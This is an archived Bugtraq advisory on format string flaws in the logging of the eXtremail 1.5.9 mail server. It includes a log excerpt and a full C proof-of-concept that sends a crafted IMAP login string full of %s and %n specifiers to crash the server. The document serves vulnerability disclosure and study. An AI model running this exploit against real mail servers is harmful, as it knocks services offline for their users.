lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20040425144049.13763.qmail@www.securityfocus.com>
Date: 25 Apr 2004 14:40:49 -0000
From: Luca Ercoli <luca.e@...web.com>
To: bugtraq@...urityfocus.com
Subject: Remote Format String Vulnerabilities in eXtremail




Package: eXtremail
Auth: http://www.extremail.com/
Version(s): 1.5.9 (current release)
Vulnerability: Format String



What’s eXtremail:

eXtremail is a Unix mail server that supports SMTP/POP3/IMAP protocols.
It includes support for virtual domains, spoofing attack ,SSL connection
and Antivirus checking.



Vulnerability Description:

Format string vulnerabilities exist in the logging routines of eXtremail,
allowing remote attackers to gain root privileges.
This security flaw can be exploited by supplying a specially crafted string
containing format specifiers  to various SMTP,POP and IMAP commands. 
The vulnerability has been reported to affect some previous versions 
(BugTraq ID: 2908), has been reintroduced in latest version of eXtremail.


Here is a snippet of eXtremail's log:

25/04/2004 - 16:26:29 -> ----------------------------------------------
25/04/2004 - 16:26:29 -> - IMAP - Incoming IMAP connection            -
25/04/2004 - 16:26:29 -> ----------------------------------------------
25/04/2004 - 16:26:29 -> IMAP - IMAP connection: 192.168.0.150
25/04/2004 - 16:26:29 -> IMAP - Error: User %s25/04/2004 - 16:26:29 -> SIGN - Signal: segmentation fault received
25/04/2004 - 16:26:29 -> SIGN - Signal: segmentation fault received



After a successful denial of service attack, eXtremail must be restarted 
to regain its functionality (Smptd,Pop3d,Imapd,Remt).






Proof of Concept:

------ eXtremail-kill.c --------


/**********************************************
*  Proof of Concept                           *
*  eXtremail 1.5.x Denial of Service	      *
*					      *
*  Luca Ercoli	<luca.e [at] seeweb.com>      *
*  Seeweb	   http://www.seeweb.com      *
*					      *
***********************************************/

#include <stdio.h>
#include <netdb.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>

#define PORT 143
#define MAXRECVSIZE 100


int main(int argc, char *argv[]);
void crash(char *host,int TYPE);


int numbytes;



void crash(char *host,int TYPE)
{

 int sockfd;  
 char buf[MAXRECVSIZE];
 struct hostent *he;
 struct sockaddr_in their_addr; 
 char poc[]="1 login %s%s%s%s%s%s%s%s%s %s%s%s%s%s%s%s%s%n%n%n\n";


  if ((he=gethostbyname(host)) == NULL) 
     {  
      perror("gethostbyname");
      exit(1);
     }

  if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1)
     {
      perror("socket");
      exit(1);
     }

 their_addr.sin_family = AF_INET;   
 their_addr.sin_port = htons(PORT);  
 their_addr.sin_addr = *((struct in_addr *)he->h_addr);
 memset(&(their_addr.sin_zero), '\0', 8); 

  if (connect(sockfd, (struct sockaddr *)&their_addr, sizeof(struct sockaddr)) == -1)
     {
      perror("connect");
      exit(1);
     }

   
  if ((numbytes=recv(sockfd, buf, MAXRECVSIZE-1, 0)) == -1)
     {
      perror("recv");
      exit(1);
     }

 buf[numbytes] = '\0';

  if (TYPE == 0)
     {
      printf("[+] Server -> %s",buf);
      sleep(1);
      printf("\n[!] Sending malicious packet...\n");

      send(sockfd,poc, strlen(poc), 0);
      sleep(1);
      printf ("\n[+] Sent!\n");
     }

 close(sockfd);

}



int main(int argc, char *argv[])
{
    
 printf("\n\n  eXtremail 1.5.x Denial of Service  \n");
 printf("by Luca Ercoli <luca.e [at] seeweb.com>\n\n\n\n");


  if (argc != 2) 
   {	
    fprintf(stderr,"\nUsage -> %s hostname\n\n",argv[0]);
    exit(1);
   }
 
 crash(argv[1],0);
 numbytes=0;
 printf ("\n[+] Checking server status ...\n");


 if(!fork()) crash(argv[1],1);
 sleep(5);
 if (numbytes == 0) printf ("\n[!] Smtpd/Pop3d/Imapd/Remt crashed!\n\n\n");

 return 0;

 
}

-------------------------------



Solution:
No solution available at the moment.







Credits:

-- 
Luca Ercoli	<luca.e [at] seeweb.com>
Seeweb		http://www.seeweb.com


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ